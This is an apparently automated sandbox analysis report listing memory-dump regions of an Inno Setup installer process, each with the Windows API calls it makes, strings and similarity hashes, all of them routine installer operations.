                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: MessagePostWindow$ForegroundProc
                                                                                    • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                    • API String ID: 602442252-3182603685
                                                                                    • Opcode ID: ad64c6b591af40ea4ba5f545b99f93c9333cd1e0c09a555d573a4fe1ca73c04e
                                                                                    • Instruction ID: d9496450f22983edaa4d95273014296636a6dee02a04e0b8031e0d1d01461ad4
                                                                                    • Opcode Fuzzy Hash: ad64c6b591af40ea4ba5f545b99f93c9333cd1e0c09a555d573a4fe1ca73c04e
                                                                                    • Instruction Fuzzy Hash: 4291E134A04A04EFD711CF29D851F99FBF7EB89700F1584AAF8069B7A1D638AD84CB14
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 005B8250: SetWindowTextW.USER32(?,00000000), ref: 005B8281
                                                                                    • ShowWindow.USER32(?,00000005,00000000,006B750A,?,?,00000000), ref: 006B729A
                                                                                      • Part of subcall function 005C61D8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C61EB
                                                                                      • Part of subcall function 00424018: SetCurrentDirectoryW.KERNEL32(00000000,?,006B72C2,00000000,006B74D1,?,?,00000005,00000000,006B750A,?,?,00000000), ref: 00424023
                                                                                      • Part of subcall function 005C5D2C: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005C5DC1,?,?,?,00000001,?,0060FCDE,00000000,0060FD49), ref: 005C5D61
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                    • String ID: .dat$.msg$IMsg$Uninstall
                                                                                    • API String ID: 3312786188-1660910688
                                                                                    • Opcode ID: 9bac32933d93267d62a0efbfbf38caf58aabf4bae368766dc52fc197654038be
                                                                                    • Instruction ID: 9c0d9b5f261d395dc086ceef7e8291460dcd09bff1b52f9da0bdf24afaf5186f
                                                                                    • Opcode Fuzzy Hash: 9bac32933d93267d62a0efbfbf38caf58aabf4bae368766dc52fc197654038be
                                                                                    • Instruction Fuzzy Hash: 5841A274A006159FC700EFA4CC52E9EBBF6FBC8300B508465F801A7761DB34AE40DB55
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • MsgWaitForMultipleObjects.USER32 ref: 00624902
                                                                                    • GetExitCodeProcess.KERNEL32 ref: 00624925
                                                                                    • CloseHandle.KERNEL32(?,00624958,00000001,00000000,000000FF,000004FF,00000000,00624951), ref: 0062494B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                    • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                    • API String ID: 2573145106-3235461205
                                                                                    • Opcode ID: 732e9f8b326961f4a5555d537b9d01a6aab9f08cc06af6535321f619a3cc4655
                                                                                    • Instruction ID: a132d3f15b3ed1f1d80a1d3b4c170ebef992d73a30201ff541600c1582f6e0c9
                                                                                    • Opcode Fuzzy Hash: 732e9f8b326961f4a5555d537b9d01a6aab9f08cc06af6535321f619a3cc4655
                                                                                    • Instruction Fuzzy Hash: 07018470E04604AFD710DBA99952A9E77AAEB4A724B600265F524D73D0DE34DD40CA15
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 004070E7
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 004070ED
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 004070FC
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 0040710D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory
                                                                                    • String ID: :
                                                                                    • API String ID: 1611563598-336475711
                                                                                    • Opcode ID: aa9707b4d0d9c5d03511b22bbefae7383822b12ede650e628390a7387f8948e9
                                                                                    • Instruction ID: 4e46778bef482c884a40b6a77bd37b1cdf5980326a29a022de95e28d89e8e0a5
                                                                                    • Opcode Fuzzy Hash: aa9707b4d0d9c5d03511b22bbefae7383822b12ede650e628390a7387f8948e9
                                                                                    • Instruction Fuzzy Hash: 71F0627154474465D310E7658852BDB729CDF84348F04843E76C89B2D1E6BC5948979B
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 40b3b5ba3f34c12df063ee6c251904e89849e49180af3165c918a28def48443d
                                                                                    • Instruction ID: 706b2e572761d8ad47ba34f54f722de4143ff6edab11ef8c4ec80c26a390842e
                                                                                    • Opcode Fuzzy Hash: 40b3b5ba3f34c12df063ee6c251904e89849e49180af3165c918a28def48443d
                                                                                    • Instruction Fuzzy Hash: C211A26060425956FF706A7A6F09BEA3F9C7FD1745F050429BE41AB283CB38CC458BA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • UnhookWindowsHookEx.USER32(00000000), ref: 005B632E
                                                                                    • SetEvent.KERNEL32(00000000), ref: 005B635A
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 005B635F
                                                                                    • MsgWaitForMultipleObjects.USER32 ref: 005B6388
                                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 005B6395
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CloseCurrentEventHandleHookMultipleObjectsThreadUnhookWaitWindows
                                                                                    • String ID:
                                                                                    • API String ID: 2132507429-0
                                                                                    • Opcode ID: 9ea434fb30454688688f09122d05a87b29c41a253c523ce44195e8fd4ce8e1aa
                                                                                    • Instruction ID: cd3b1eb59f2816b39bfe75ca0595b4a5fb52581fa55038232e58a65bf6996549
                                                                                    • Opcode Fuzzy Hash: 9ea434fb30454688688f09122d05a87b29c41a253c523ce44195e8fd4ce8e1aa
                                                                                    • Instruction Fuzzy Hash: AE016D70A09300AFD700EBA5EC45BAA37E5FB46714F105A2EF194C71D1DF38A880CB42
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060CE51), ref: 0060CE01
                                                                                    • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060CE51), ref: 0060CE11
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CloseCreateFileHandle
                                                                                    • String ID: .tmp$_iu
                                                                                    • API String ID: 3498533004-10593223
                                                                                    • Opcode ID: c82ceb5325a86bdc840e8660d5d66ee3278075395e2e2834d729ae026569d360
                                                                                    • Instruction ID: f0c61975f8e987b86bac7f04f067b2ad5b288a9d8ae99280b348037a25044e3b
                                                                                    • Opcode Fuzzy Hash: c82ceb5325a86bdc840e8660d5d66ee3278075395e2e2834d729ae026569d360
                                                                                    • Instruction Fuzzy Hash: CD319E30A40209ABDB14EBE4C842FDEBBB9EF44714F1042A9F804B73C2D778AE459B54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 005B923C: GetCursorPos.USER32 ref: 005B9243
                                                                                    • SetTimer.USER32 ref: 005B93B3
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 005B93ED
                                                                                    • WaitMessage.USER32(00000000,005B9431,?,?,?,00000000), ref: 005B9411
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CurrentCursorMessageThreadTimerWait
                                                                                    • String ID: Dl
                                                                                    • API String ID: 3909455694-1042291793
                                                                                    • Opcode ID: 1f6f0a1c510f93f692655a977ba6e5298b4086ccb601a4d072a2bbdb339548d0
                                                                                    • Instruction ID: 597a7682cf751412642d1ca47e474f5c06ff596d9fe9d998d875485cc057c909
                                                                                    • Opcode Fuzzy Hash: 1f6f0a1c510f93f692655a977ba6e5298b4086ccb601a4d072a2bbdb339548d0
                                                                                    • Instruction Fuzzy Hash: 43416C30A04244EFDB11DFA9D88ABEDBBF6FB45304F6188B9E904972A1C7746E41CB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

APIs
• GetFileAttributesW.KERNEL32(00000000,000000EC,00000000,006B791E,?,?,006D479C,?,006B7D50,00000000,006B7D5A,?,00000000,006B7D8A,?,?), ref: 006B7890
• SetFileAttributesW.KERNEL32(00000000,00000000,00000000,000000EC,00000000,006B791E,?,?,006D479C,?,006B7D50,00000000,006B7D5A,?,00000000,006B7D8A), ref: 006B78B9
• MoveFileExW.KERNEL32(00000000,00000000,00000001,00000000,000000EC,00000000,006B791E,?,?,006D479C,?,006B7D50,00000000,006B7D5A,?,00000000), ref: 006B78D2
Strings
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: File$Attributes$Move
• String ID: isRS-%.3u.tmp
• API String ID: 3839737484-3657609586
• Opcode ID: 08fb3f8a2552ed2ef6fee7f0fa6a00d655b048a56f687b70bca4fdfe3b5c4a69
• Instruction ID: 0f43dc597fc5b70accabae0da728ee0b08a343283778375b3c6cba122b7c2eac
• Opcode Fuzzy Hash: 08fb3f8a2552ed2ef6fee7f0fa6a00d655b048a56f687b70bca4fdfe3b5c4a69
• Instruction Fuzzy Hash: 95318170D04208AFCB00EBA9C8859EEB7B9EF84314F11467AF814B7291D7385E81CB99
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(00000000,00000B06,00000000,00000000), ref: 00614D26
• SendMessageW.USER32(00000000,00000B00,00000000,00000000), ref: 00614DC3
Strings
• Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00614D52
• Failed to create DebugClientWnd, xrefs: 00614D8C
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend
• String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
• API String ID: 3850602802-3720027226
• Opcode ID: ea57cd588fe8570c91b24ef0b746a875249b5149722270d15631428ffe25c9ac
• Instruction ID: d134127b693325792274e9a01a70f49e89543c9fcfe531e84006ac1a280ab911
• Opcode Fuzzy Hash: ea57cd588fe8570c91b24ef0b746a875249b5149722270d15631428ffe25c9ac
• Instruction Fuzzy Hash: 3311E7B1A043519FD700EB69EC81F9A7B95AF45314F08402AF585CB392DB759C84C7A5
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 005C5124: GetFullPathNameW.KERNEL32(00000000,00001000,?,?,00000002,?,?,006D479C,00000000,0060D257,00000000,0060D532,?,?,006D479C), ref: 005C5155
• LoadTypeLib.OLEAUT32(00000000,00000000), ref: 0062447B
• RegisterTypeLib.OLEAUT32(?,00000000,00000000), ref: 00624497
Strings
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Type$FullLoadNamePathRegister
• String ID: LoadTypeLib$RegisterTypeLib
• API String ID: 4170313675-2435364021
• Opcode ID: 3aca009d31f0f1a8cac111bc50824ede26e8fddbcab806dd9635b5a5ee37d0ef
• Instruction ID: e38850ae6034221aecf35b856b26f0223ed0c8226c2a0ebd231c24fb5e5372d8
• Opcode Fuzzy Hash: 3aca009d31f0f1a8cac111bc50824ede26e8fddbcab806dd9635b5a5ee37d0ef
• Instruction Fuzzy Hash: 4D0148307406046BDB10FBA6DC82B4E77EDEB48704F504875B500F6292DB74AE158A19
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0060D454
  • Part of subcall function 00423A18: DeleteFileW.KERNEL32(00000000,?,?,006D479C,?,006B7D35,00000000,006B7D8A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A28
  • Part of subcall function 00423A18: GetLastError.KERNEL32(00000000,?,?,006D479C,?,006B7D35,00000000,006B7D8A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A37
  • Part of subcall function 00423A18: GetFileAttributesW.KERNEL32(00000000,00000000,?,?,006D479C,?,006B7D35,00000000,006B7D8A,?,?,00000005,?,00000000,00000000,00000000), ref: 00423A3F
  • Part of subcall function 00423A18: RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,006D479C,?,006B7D35,00000000,006B7D8A,?,?,00000005,?,00000000,00000000), ref: 00423A5A
• MoveFileW.KERNEL32(00000000,00000000), ref: 0060D481
  • Part of subcall function 0060C7E4: GetLastError.KERNEL32(00000000,0060D50A,00000005,00000000,0060D532,?,?,006D479C,?,00000000,00000000,00000000,?,006B79CB,00000000,006B79E6), ref: 0060C7E7
Strings
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: File$AttributesErrorLast$DeleteDirectoryMoveRemove
• String ID: DeleteFile$MoveFile
• API String ID: 3947864702-139070271
• Opcode ID: f3368971435f0e1ffcad46702f9ad1321795944c84a6ed4736d87a1c7c95c989
• Instruction ID: e65586cb8c2ba221caf3cfd224dcd0eff8e091a7cc457f3bf2639edee59451d9
• Opcode Fuzzy Hash: f3368971435f0e1ffcad46702f9ad1321795944c84a6ed4736d87a1c7c95c989
• Instruction Fuzzy Hash: 42F049716841054ADB09FBF6E9065AF63E5EF44318F504A7EF804E72C1D63C9C05462D
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 005C6790: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,jn\,?,00000000,?,005C6E0A,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C6E6A), ref: 005C67AC
• RegCloseKey.ADVAPI32(00000000,?,00000001,00000000,00000003,00626BCC,00000003,00000000,00626F17,00000000,006270D1,?,00626BCC,?,00000000,00000000), ref: 00626DC1
Strings
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CloseOpen
• String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
• API String ID: 47109696-2631785700
• Opcode ID: ec07e0db51d3c638d208cea47c9fb61d7565527b1549b85ae51ece4d1ddb7960
• Instruction ID: 8af0ce4ad620272c9594f6d9018686f01a2d88763efb0c0a0c7834eb730a36f0
• Opcode Fuzzy Hash: ec07e0db51d3c638d208cea47c9fb61d7565527b1549b85ae51ece4d1ddb7960
• Instruction Fuzzy Hash: 32F02231B01528AFD710AF49E845B9A6BCADFD6352F91143AF185C3290E6B1CC028F92
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RegDeleteKeyW.ADVAPI32(?,00000000), ref: 005C67C4
• GetModuleHandleW.KERNEL32(advapi32.dll,RegDeleteKeyExW,?,00000000,005C69AB,00000000,005C69C3,?,?,?), ref: 005C67DF
Strings
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: DeleteHandleModule
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 3550747403-4033151799
• Opcode ID: 446bbcfcc69e87ec6a54bc98b0bd0db8a719cbf54cb0d116f2ffc1e03499b033
• Instruction ID: dc63331fa5a8f3f500f99eadda01b9e76553ba7a97e57ea72adecfe1af790e06
• Opcode Fuzzy Hash: 446bbcfcc69e87ec6a54bc98b0bd0db8a719cbf54cb0d116f2ffc1e03499b033
• Instruction Fuzzy Hash: 84E06DB0A42210AFD32467A9BC4AFD22F89FB8575EF50382FF10155492CBB84D90C2A4
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,?,00000004,006CBEB0,00614DAA,00615224,00614CC8,00000000,00000B06,00000000,00000000), ref: 005C7476
  • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
  • Part of subcall function 005C73C0: GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005C74B6,?,00000004,006CBEB0,00614DAA,00615224,00614CC8,00000000,00000B06,00000000,00000000), ref: 005C73D7
• ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,?,00000004,006CBEB0,00614DAA,00615224,00614CC8,00000000,00000B06,00000000,00000000), ref: 005C74A7
Strings
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: HandleModule$AddressChangeFilterMessageProcWindow
                                                                                    • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                    • API String ID: 989041661-2676053874
                                                                                    • Opcode ID: a7f6f2e5f8f57a6afa57f5accac88337017fdea6f4c9c9ed7d5e2355f95595c0
                                                                                    • Instruction ID: 26a363f38c9b500d63c7b8355889e9a68f3a4e891c8784958a891250910d6643
                                                                                    • Opcode Fuzzy Hash: a7f6f2e5f8f57a6afa57f5accac88337017fdea6f4c9c9ed7d5e2355f95595c0
                                                                                    • Instruction Fuzzy Hash: 1CF027706093149FD704ABA9BCC4F853F99FB8D351F00152EF204C6581CBB80C808EA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(00000000,00469A44,?,?,00443D44,00000001), ref: 00469982
  • Part of subcall function 0042369C: CreateFileW.KERNEL32(00000000,000000F0,000000F0,00000000,00000003,00000080,00000000,?,?,00443D44,004699C4,00000000,00469A44,?,?,00443D44), ref: 004236EB
  • Part of subcall function 00423BC8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?,?,?,?,00443D44,004699DF,00000000,00469A44,?,?,00443D44,00000001), ref: 00423BEB
• GetLastError.KERNEL32(00000000,00469A44,?,?,00443D44,00000001), ref: 004699E9
  • Part of subcall function 00427D4C: FormatMessageW.KERNEL32(00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,00443D44,00000000,?,004699F8,00000000,00469A44), ref: 00427D70
  • Part of subcall function 00427D4C: LocalFree.KERNEL32(00000001,00427DC9,00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,00443D44,00000000,?,004699F8,00000000,00469A44), ref: 00427DBC
Strings
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$CreateFileFormatFreeFullLocalMessageNamePath
• String ID: TUA$\UA
• API String ID: 503893064-4291284429
• Opcode ID: 16c3a7c1edecb1a6fb67f941cdccc39d2bbf5b553f33231be13615cc94cc8ccc
• Instruction ID: 8d929fe5fe5036276eb1cf3e5c1d8d9621af2457b238719d8755a1a314a4a9d0
• Opcode Fuzzy Hash: 16c3a7c1edecb1a6fb67f941cdccc39d2bbf5b553f33231be13615cc94cc8ccc
• Instruction Fuzzy Hash: 5841C370B002599FCB00EFA9D8815EEB7F5AF48314F50812AE514A7382DB7D5E059B6A
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040DE85
• SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040DEE3
• SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040DF40
• SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040DF73
  • Part of subcall function 0040DE30: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040DEF1), ref: 0040DE47
  • Part of subcall function 0040DE30: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040DEF1), ref: 0040DE64
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
Similarity
• API ID: Thread$LanguagesPreferred$Language
• String ID:
• API String ID: 2255706666-0
• Opcode ID: 339f940500be62133d20186022ad95a148fb343104f844956e141825995a35fa
• Instruction ID: 6b3602698f867434315670786c57d1330f11e75d411b24415d78b62a36c3f300
• Opcode Fuzzy Hash: 339f940500be62133d20186022ad95a148fb343104f844956e141825995a35fa
• Instruction Fuzzy Hash: 6B316F70E1021A9BDB10DFE9C884AAEB7B5EF14304F40417AE555E72D1DB789A09CB94
Uniqueness
Uniqueness Score: -1.00%

APIs
• MulDiv.KERNEL32(?,?,?), ref: 005CD2AD
• MulDiv.KERNEL32(?,005CD3DF,?), ref: 005CD2C0
• MulDiv.KERNEL32(?,?,?), ref: 005CD2D7
• MulDiv.KERNEL32(?,005CD3DF,?), ref: 005CD2F5
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d854f0a41b6c0be31f27ed2a2595d08c7a93b107329d657449771b3e36219948
• Instruction ID: 2647700dfaabd85a373208064ba8ef14f9f71db11805bddc88b4befc8354b4ba
• Opcode Fuzzy Hash: d854f0a41b6c0be31f27ed2a2595d08c7a93b107329d657449771b3e36219948
• Instruction Fuzzy Hash: 05113076A04214AFCB44DEDDD8C4E9B7BEDEF48360B1440A9F908DB242C634ED80C7A4
Uniqueness
Uniqueness Score: -1.00%

APIs
• IsWindowVisible.USER32 ref: 005B95A3
• GetWindowLongW.USER32(?,000000EC), ref: 005B95E5
• SetWindowLongW.USER32 ref: 005B95FF
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,C31852FF,?,00000000,?,005B96B9,?,?,?,00000000), ref: 005B9627
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
Similarity
• API ID: Window$Long$Visible
• String ID:
• API String ID: 2967648141-0
• Opcode ID: cbd3c45b461b391437ba7066b1b61bcc809b1be27560bc9892573cc00352a45d
• Instruction ID: 5518093a597a3e42cc7efe86925244264c3f969ac261f295b92f519f6962ed08
• Opcode Fuzzy Hash: cbd3c45b461b391437ba7066b1b61bcc809b1be27560bc9892573cc00352a45d
• Instruction Fuzzy Hash: C3115E742451446FDB00DB38E989FEA7FE9AB44314F449191F984CB362CB38ED81CB54
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindResourceW.KERNEL32(?,?,?,00444A48,?,00000001,00000000,?,0046A152,00000000,00000000,?,006D479C,?,?,006AB298), ref: 0046A227
• LoadResource.KERNEL32(?,0046A2AC,?,?,?,00444A48,?,00000001,00000000,?,0046A152,00000000,00000000,?,006D479C,?), ref: 0046A241
• SizeofResource.KERNEL32(?,0046A2AC,?,0046A2AC,?,?,?,00444A48,?,00000001,00000000,?,0046A152,00000000,00000000), ref: 0046A25B
• LockResource.KERNEL32(00469AF8,00000000,?,0046A2AC,?,0046A2AC,?,?,?,00444A48,?,00000001,00000000,?,0046A152,00000000), ref: 0046A265
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
